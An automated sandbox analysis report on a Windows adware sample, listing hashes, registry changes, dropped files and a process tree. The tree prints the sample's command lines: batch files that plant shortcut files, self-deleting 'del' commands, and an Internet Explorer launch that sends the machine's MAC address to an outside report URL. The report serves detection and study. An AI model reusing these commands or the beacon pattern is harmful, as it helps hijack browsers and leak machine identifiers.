218f800c0a42b7bc31874d823e0b8ba2e46d81d08125e63aa7f56edfb01ae82a

Analysis

max time kernel
96s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
14/07/2024, 12:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe
Size

50KB
MD5

45cd0b19dde5c7d1c2a0abf1c1cda1d9
SHA1

5b1773f96769fec6402212994b091ce2abdf819a
SHA256

218f800c0a42b7bc31874d823e0b8ba2e46d81d08125e63aa7f56edfb01ae82a
SHA512

019066f02d6a83d5f3a434cfcf70489073c4f040ba5d2c8318e137fa4aa0c5ca1328a234105e7035bc2885be9a2a9e51102c8594510fd52f58268bf28d6f7bbb
SSDEEP

768:McVJYDePPJvb5CavomAbDCTOhRjMss59QLfN2ssvVEyewqHB+ThL3quOlsC7:ZqDQPJvb5bomAKTImmZ1s+yewq3tlL7

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	insA3C2.tmp

Executes dropped EXE 1 IoCs

pid	Process
1864	insA3C2.tmp

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WinRAR\winRarExt64.dat	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	expand.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3081326622"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118824"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31118824"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3073201353"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E2C62C8C-41DB-11EF-A174-E2A4B68B11BB} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118824"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3081326622"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80181eb8e8d5da01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60702cb8e8d5da01	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31118824"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118824"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118824"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3073045049"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "427724788"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3081326622"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118824"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000910d3a7c1e28bd46a564221e06ecd81800000000020000000000106600000001000020000000a77fd8e9045353f3ff70a7389274ac756debe7033fb3ea67d040cd0e11247c72000000000e80000000020000200000000b7c4a48723ecff7c8a17885a3a84bee4105af8037f4bb9672a6464baa76acbb20000000b3a190160234e5aa69cbaa0e64d9e5b40f677cf46ec31c9eef7d65cce17a4eab40000000b0f23284ce85d2d51b8c4b36c869c9bdd1589900d3b6837544c241caebb903e89c394f6db2a6b330172b27d758012045c49681b6069337232c5144a26232faa5	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E2CAF110-41DB-11EF-A174-E2A4B68B11BB} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E2C88EE9-41DB-11EF-A174-E2A4B68B11BB} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3073201353"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000910d3a7c1e28bd46a564221e06ecd81800000000020000000000106600000001000020000000fc1dc0a6de475aff085c6ce86e256e6e4c839568e73cf53cdc90cb671f66d601000000000e8000000002000020000000d450506764c6db731a0eacdc7637835aadbdeb7503d1f38243b2d5d25835ae262000000023640bb306db1a1d1acec7b1828eda3f4dd13e13cdb716e2461ab98162928710400000004d87575694481520eabfa067b74a1dba2d3df7ab9d33e26bd7af939de900cafe63c8d8c9a41e89873ba38326c57d22cc8c3585851b271455b4965c676e67c4f6	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeIncBasePriorityPrivilege	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe
Token: SeIncBasePriorityPrivilege	1864	insA3C2.tmp

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
5028	iexplore.exe
684	iexplore.exe
3360	iexplore.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
3360	iexplore.exe
3360	iexplore.exe
684	iexplore.exe
684	iexplore.exe
5028	iexplore.exe
5028	iexplore.exe
4236	IEXPLORE.EXE
4236	IEXPLORE.EXE
4320	IEXPLORE.EXE
4320	IEXPLORE.EXE
1868	IEXPLORE.EXE
1868	IEXPLORE.EXE
4320	IEXPLORE.EXE
4320	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 3364 wrote to memory of 2416	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	89
PID 3364 wrote to memory of 2416	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	89
PID 3364 wrote to memory of 2416	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	89
PID 3364 wrote to memory of 224	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	90
PID 3364 wrote to memory of 224	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	90
PID 3364 wrote to memory of 224	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	90
PID 3364 wrote to memory of 396	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	93
PID 3364 wrote to memory of 396	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	93
PID 3364 wrote to memory of 396	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	93
PID 3364 wrote to memory of 684	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	95
PID 3364 wrote to memory of 684	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	95
PID 3364 wrote to memory of 3360	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	96
PID 3364 wrote to memory of 3360	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	96
PID 3364 wrote to memory of 5028	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	97
PID 3364 wrote to memory of 5028	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	97
PID 224 wrote to memory of 4244	224	cmd.exe	98
PID 224 wrote to memory of 4244	224	cmd.exe	98
PID 224 wrote to memory of 4244	224	cmd.exe	98
PID 3364 wrote to memory of 728	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	99
PID 3364 wrote to memory of 728	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	99
PID 3364 wrote to memory of 728	3364	45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe	99
PID 396 wrote to memory of 1040	396	cmd.exe	100
PID 396 wrote to memory of 1040	396	cmd.exe	100
PID 396 wrote to memory of 1040	396	cmd.exe	100
PID 3360 wrote to memory of 4320	3360	iexplore.exe	102
PID 3360 wrote to memory of 4320	3360	iexplore.exe	102
PID 3360 wrote to memory of 4320	3360	iexplore.exe	102
PID 684 wrote to memory of 4236	684	iexplore.exe	103
PID 684 wrote to memory of 4236	684	iexplore.exe	103
PID 684 wrote to memory of 4236	684	iexplore.exe	103
PID 5028 wrote to memory of 1868	5028	iexplore.exe	104
PID 5028 wrote to memory of 1868	5028	iexplore.exe	104
PID 5028 wrote to memory of 1868	5028	iexplore.exe	104
PID 2416 wrote to memory of 1864	2416	cmd.exe	105
PID 2416 wrote to memory of 1864	2416	cmd.exe	105
PID 2416 wrote to memory of 1864	2416	cmd.exe	105
PID 1864 wrote to memory of 2928	1864	insA3C2.tmp	107
PID 1864 wrote to memory of 2928	1864	insA3C2.tmp	107
PID 1864 wrote to memory of 2928	1864	insA3C2.tmp	107

C:\Users\Admin\AppData\Local\Temp\45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\45cd0b19dde5c7d1c2a0abf1c1cda1d9_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\run_dws_file.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Users\Admin\AppData\Local\Temp\insA3C2.tmp
    C:\Users\Admin\AppData\Local\Temp\insA3C2.tmp inlink-verycm.tmp
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\insA3C2.tmp > nul
      4⤵
      PID:2928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp_ext_favurl_cab.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:224
- - C:\Windows\SysWOW64\expand.exe
    expand.exe "C:\Users\Admin\AppData\Local\Temp\favorites_url.cab" -F:*.* "C:\Users\Admin\Favorites"
    3⤵
    - Drops file in Windows directory
    PID:4244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp_ext_deskurl_cab.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\SysWOW64\expand.exe
    expand.exe "C:\Users\Admin\AppData\Local\Temp\desktop_url.cab" -F:*.* "C:\Users\Admin\Desktop"
    3⤵
    - Drops file in Windows directory
    PID:1040
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://jump2.35638.com:27889/report3.ashx?m=E2-A4-B6-8B-11-BB&mid=21663&tid=1&d=cbe6331d3863c976f71d47bd386619af&uid=13729&t=
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:684
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:684 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:4236
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://tc.58816.com/
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3360 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:4320
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://www.38522.com/bhy.html?popup
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5028 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\45CD0B~1.EXE > nul
  2⤵
  PID:728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E2C88EE9-41DB-11EF-A174-E2A4B68B11BB}.dat

Filesize
5KB

MD5
b150957ec5d25c02423a3be15c905852

SHA1
dd8fbe003fbfbb50aa67772baa1ae8b4ef16cb26

SHA256
9b689d1552eabd345498248fd75dd631bb6be869103a7bcfa9c3c7f0cb12a095

SHA512
11fb0158e5ea6d4c21d5b9f15bbc8f60ce99fbb4e2291eb2506e5142afc548174ea103abcacf1111a6d385b22a7b60fd2ba0e261b3e9ad59e63b13d32364e389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E2C88EE9-41DB-11EF-A174-E2A4B68B11BB}.dat

Filesize
5KB

MD5
9c1f197dbda1e0cbee996cbf8ff9674e

SHA1
177dd65d9836bbbcbf77a3eb741200b9595a9989

SHA256
5230538a64ae2832dfcafd5f9d84d1b413862a5a977ec049c8a1af9708c01e80

SHA512
a979242c306cd2207528524fa0d52d8d6c75e80bf167f0355ed93308c3edab2221be282302d970ef2ef804fa7d9a22368810febeead5516823691d7407ff66a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E2CAF110-41DB-11EF-A174-E2A4B68B11BB}.dat

Filesize
5KB

MD5
4b941cc992f61767c8559bff69f7db78

SHA1
cc3a3ab75cc3336347903f556f276b8175af1f0d

SHA256
ff0fcd89eae8d708db7f93ceed06b466f842b262de689a03ff81f5d03c36462e

SHA512
0b951957304f2f5ae45a6a649dd4cf7dcbf95d1083f790c7fc135e0dd1abc1d409dcf6442a1d1b80fa749fe1cc33be1b830a2d9c6a2c72d4fb7671fbcdaef4c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver1DF4.tmp

Filesize
15KB

MD5
1a545d0052b581fbb2ab4c52133846bc

SHA1
62f3266a9b9925cd6d98658b92adec673cbe3dd3

SHA256
557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

SHA512
bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5G8JI3LV\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\inlink-verycm.tmp

Filesize
837B

MD5
c077996cf1104d111854436b6b58256c

SHA1
876a651e93a292354764bbf8ba4066efd6acfbb4

SHA256
04f7a50d4e9b5d4318cb811c662faaee3193aa86f6e1f1567e1194d13671168c

SHA512
bd582a5a5dbfe6c22906af145f9676339b23df6a31cc16edc2c0711d617e60f7abce4e96da7235dd0fd892488eb0874ae11460dbbd59b83f4b6807e9179fa1da

Download Submit
C:\Users\Admin\AppData\Local\Temp\run_dws_file.bat

Filesize
63B

MD5
061448c4a3206c3be956cd6ee62e710d

SHA1
a596a275bee857674037e805a7b03e743e8facd3

SHA256
7b148f69533a1cb2495338e7f0b58c6e0da9c8e2d3abb50a38fd5690fd4e80b4

SHA512
8ad9392a9215529952266effc739d3236e9bef3cdc71750f7172cf64fb1c7f4c33c8acd731be28ad81cb31696d0e6021b37ded45a01d6d90bd3b17c53e84663d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp_ext_deskurl_cab.bat

Filesize
94B

MD5
d5fc3a9ec15a6302543438928c29e284

SHA1
fd4199e543f683a8830a88f8ac0d0f001952b506

SHA256
b2160315eb2f3bcb2e7601e0ce7fbb4ed72094b891d3db3b5119b07eeccc568d

SHA512
4d0378480f1e7d5bee5cf8f8cd3495745c05408785ab687b92be739cd64c077f0e3ee26d6d96e27eb6e2c3dec5f39a2766c45854dc2d6a5b6defc672aeafa0f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp_ext_favurl_cab.bat

Filesize
98B

MD5
8663de6fce9208b795dc913d1a6a3f5b

SHA1
882193f208cf012eaf22eeaa4fef3b67e7c67c15

SHA256
2909ea8555f2fc19097c1070a1da8fcfd6dc6886aa1d99d7e0c05e53feeb5b61

SHA512
9381063e0f85e874be54ae22675393b82c6ab54b223090148e4acbeff6f22393c96c90b83d6538461b695528af01d1f1231cf5dc719f07d6168386974b490688

Download Submit
C:\Users\Admin\Favorites\°ËØÔÉ«Í¼.url

Filesize
154B

MD5
8d681a59ea75e91f730bd9ce3c42e514

SHA1
9d426029daeebf03c9053761e0e5a9f447f98e9c

SHA256
afd3d42faa66d6703a32f2f5b41e0d679dd8210aacb284d1e46854207087cac7

SHA512
ffece212187fb127e98a612a59e7f2df7e9ebc6fee600644e2eef80d62fcc7d411ffba435b48981c4d75ba0ca34f85ff57091f4098104651710220a28a13ba8d

Download Submit
C:\Users\Admin\Favorites\°Ù¹ÈµçÓ°.url

Filesize
155B

MD5
5a17106c27138df10448c2c3be95f399

SHA1
56acc2ed4fea4171127a13dcdee08bdd39d674d6

SHA256
c544ab13bd785ea3d5792873dedb102e87ea9a3b28fb1283be2eaac363ce360c

SHA512
1d8839f36323dfb4458745dbf31a98bc676121db3e4ccda59ca8e177437c85a5811125119fbfa3b5bcde6c2fbf25ae910109e785e276c32fbfebe6437aea8198

Download Submit
C:\Users\Admin\Favorites\´´ÒµÍ¶×ÊºÃÏîÄ¿.url

